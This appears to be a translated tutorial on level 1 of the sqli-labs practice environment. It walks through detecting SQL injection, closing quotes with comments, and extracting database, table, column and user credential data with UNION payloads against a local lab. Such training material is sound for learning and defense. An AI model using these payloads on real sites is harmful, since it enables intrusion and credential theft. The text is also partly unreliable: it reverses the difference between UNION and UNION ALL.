foreword
Starting from this article, we will start to really explain the various injections in Sqli-libs. Starting from the first level, the follow-up content will be released one after another. Welcome your attention and comments!
Less-1
First, open the home page and enter the first level:
You can see the prompt, prompting us to pass in a parameter named ID, and it is a data type, then I will pass in this parameter to see
At this point, we can find that the SQL statement executed in the background seems to be queried according to the incoming parameter id, then I can see what is in its database from the built environment:
From here, we can determine that the function of the SQL statement executed by PHP is to query the user whose id is the id we passed in from the database, and display the obtained username and password in the database. We can guess the SQL statement. The structure is:
select username,password from users where id=$_GET[id]or:
select username,password from users where id="$_GET[id]"
select username,password from users where id='$_GET[id]'
The data listed here can be queried, so if we want to attack this website, then we need to guess how the SQL statement of this page is written, and to guess which of the above cases it belongs to, In this way, we can carefully construct our SQL statements to obtain the information we want, or perform addition, deletion, modification and query operations on the database, or use database software to read or write files on the server, and so on.
Let's make a simple attempt
The title requires that the parameter id we pass in must be an integer, so we can pass in a non-integer to see:
We enter a "'" here to do a simple test
It can be found that when we enter " '", an error occurs, and the content of the error is:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
And from the content of the error, we can see that it has displayed some SQL statements:
'1'' LIMIT 0,1'
And the 1' here is the parameter we passed in, then we can improve the guess just now, we can see that the parameter 1' we input is enclosed by two single quotes, and the result of the query is also carried out later. slicing, so that the result of the query is only one
select username,password from users where id='$_GET[id]' limit 0,1
Then after we passed in the malformed parameters just now, the spliced SQL statement is
select username,password from users where id='1'' limit 0,1
For the mysql terminal, if the single quotes we enter do not match, the MySQL client will always wait for the user to close the single quotes, for example:
For the SQL execution statement, it will think that this is a wrong SQL statement and return an error message, then after we understand this basic principle, what we need to do now is how to close the single quotation mark or comment Drop the single quote so that the SQl statement can be executed normally.
The comments are:
Single line comment: -- Multi-line comments: /**/
It should be noted that the single-line comment here is two "-", and there is a space after the "-"!
Here we can think about what the SQL statement should look like when we add comments:
select username,password from users where id='1'-- ' limit 0,1
or
select username,password from users where id='1' # ' limit 0,1
Let's do a little test to see:
It can be found from the above results that the statement can be executed normally, which means that the SQL statements of the backdoor are commented out
important point:
1. Why is --+ instead of --
Here the character - and character + have fixed meanings in the URL. For example, + represents a space in URL encoding, while in URL encoding - does not need to be encoded.2. Why --+ is not used by URL
Since we use + instead, there is no need to encode, we can also use URL encoding with spaces without +, then the encoded URL should be :
http://127.0.0.1/Less-1/?id=1%27--%20
3. Why does # have to be coded, can’t it be done without coding?
No, because # has a fixed meaning in the URL, indicating the anchor point in the page. If you don't encode it, the browser will treat it as the anchor point of the page, and here we need to transmit it to the server as data. , so URL encoding is required
4. Why not use multi-line comments to comment the following statements
Because the format of a multi-line comment is:
/*Comment content*/
There needs to be markers before and after the comment, but here we can only control one of the SQL statements, that is, where the id is entered, so it is impossible to construct a correct multi-line comment, so no!
Next, we need to use this injection to query the data summarized in the database step by step!
Guess the field length
According to the above echo, it can be interpreted that the length of this field is 3
Union joint query concept:
Here we will use union union query. The function of union union query is to combine two SQL statements. The number of selected columns in the two SQL statements before and after Union must be the same. For union, if the first SQL query statement is wrong, it will use the query result of the second SQL statement as the final output, which is very important in our injection.
In our usual use, union all is also used. The difference between it and union is that it adds the function of deduplication.
Determine the echo bits (use union from here)
Explosive database name
According to our previous speculation, the SQL query statement submission background used here should be the following mode:
SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1
Explode data table information in database security
The background SQL statement at this time should be:
SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1
Explode the column information in the user table
At this point, the SQL statement executed in the background should be:
SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ LIMIT 0,1
Explosive field data information
At this point, the SQL statement in the background should be:
SELECT * FROM users WHERE id='-1'union select 1,username,password from users where id=3--+ LIMIT 0,1
Maybe many people may think, is there any difference between here and start? As long as I modify the value of the parameter id at the beginning, can I get other field information? Why should this be so? But if you think so, then you have overlooked that, in the previous case, you could only query the specified database, table name, and field information, but now you can modify it and query the information of the database of other systems!
At this point, the introduction of Less-1 is over!
Summary: In less-1, it mainly involves how to construct SQL injection statements and the process of manual injection of MySQL database. The idea here is very important!